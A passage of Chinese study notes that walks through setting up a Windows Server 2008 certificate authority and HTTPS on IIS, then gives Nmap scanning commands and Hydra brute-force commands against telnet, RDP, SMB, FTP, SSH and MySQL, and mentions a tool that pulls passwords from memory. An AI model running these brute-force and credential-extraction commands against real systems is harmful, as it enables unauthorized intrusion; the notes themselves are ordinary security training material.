5、win2008下 安装CA,我的电脑---右键管理---角色---添加角色---勾选Active Directory 证书服务---勾选证书颁发机构Web注册---添加所需角色服务---安装完成
6、打开IIS---选中服务器名---创建证书申请---填写信息---生成证书申请文件---完成
7、我的电脑---管理---服务器管理---安全信息---配置IE ESC---全部禁用---完成
8、IE---188.188.188.1/certsrv---申请证书---高级证书申请---使用base64编码---复制生成证书申请文件的内容---提交
web浏览器证书:不是给服务器申请的,是给员工申请的,IIS提供服务,IIS需要下载证书,确保用户可以信任IIS
有一种网站用户相信IIS还不行,IIS还要验证用户是不是真正的用户,这个时候用户也需要去申请证书,也就是web浏览器证书
9、管理工具---证书颁发机构---挂起的申请---右键---所有任务---颁发
10、IE---188.188.188.1/certsrv---查看挂起的证书申请的状态---保存的申请证书---下载证书
证书链:A信任B,B信任C,这叫证书链
11、打开IIS---选中服务器名---完成证书申请---导入刚下载的证书
12、选中创建的网站右键---编辑绑定---添加---类型https、选择证书---确定
12、选中创建的网站---SSL设置---勾选要求SSL---应用
如果这里的SSL中客户证书设置为必需(R)的话,那就意味着客户机也需要访问188.188.188.1\certsrv进行web浏览器证书申请,申请成功之后安装即可
如果浏览器弹出此网站CA不可信的时候,那么先在188.188.188.1\certsrv中将CA机构的证书下载下来,导入到受信任的根证书颁发机构中即可
主机测探是指确定目标主机是否存活。
端口扫描就是寻找在线主机所开放的端口,并且在端口上所运行的服务。甚至可以进一步确定目标主机操作系统类型和更详细的信息
常见端口号
重要常用参数
-sP #ping 扫描
-p #指定端口范围
-sV #服务版本探测
-O(大写) #启用操作系统探测
-A #全面扫描
-oN #保存txt
Nmap -sP 10.1.1.1/24 #扫描10.1.1.0整个网段哪些设备在线
Nmap -p 21,23-25,3389 10.1.1.1 #扫描10.1.1.1的21、23、24、25、3389端口的状态
Nmap -p 21,23-25,3389 10.1.1.1/24 #扫描10.1.1.0整个网段所有在线设备的21、23、24、25、3389端口的开放状态
Nmap -p 21,23 10.1.1.1 -sV #扫描21,23的服务版本
Nmap -A 10.1.1.1 #全面扫描
Nmap -O 10.1.1.1 #扫描目标系统版本
Nmap -p 21,23 10.1.1.1 -oN E:\result.txt #扫描10.1.1.1的21、23端口的状态,并将结果保存到E:\result.txt
暴力破解密码工具
#小写字母表示固定内容,大写字母表示去密码字典遍历内容 Hydra -l a -p 123 10.1.1.1 telnet #爆破10.1.1.1的telnet端口,账号为a,密码为123 Hydra -l a -P e:\pass.txt 10.1.1.1 telnet #爆破10.1.1.1的telnet端口,账号为a,密码字典为e:\pass.txt Hydra -l a -P e:\pass.txt 10.1.1.1 rdp Hydra -l a -P e:\pass.txt 10.1.1.1 smb Hydra -l a -P e:\pass.txt 10.1.1.1 ftp Hydra -l a -P e:\pass.txt 10.1.1.1 ssh Hydra -l a -P e:\pass.txt 10.1.1.1 mysql
Hydra -L e:\user.txt -P e:\pass.txt 10.1.1.1 telnet
#爆破10.1.1.1的telnet端口,账号字典为e:\user.txt,密码字典为e:\pass.txt
Getpass是从在用户输入密码之后,从内存中提取密码,win7有此漏洞,win10已经补上了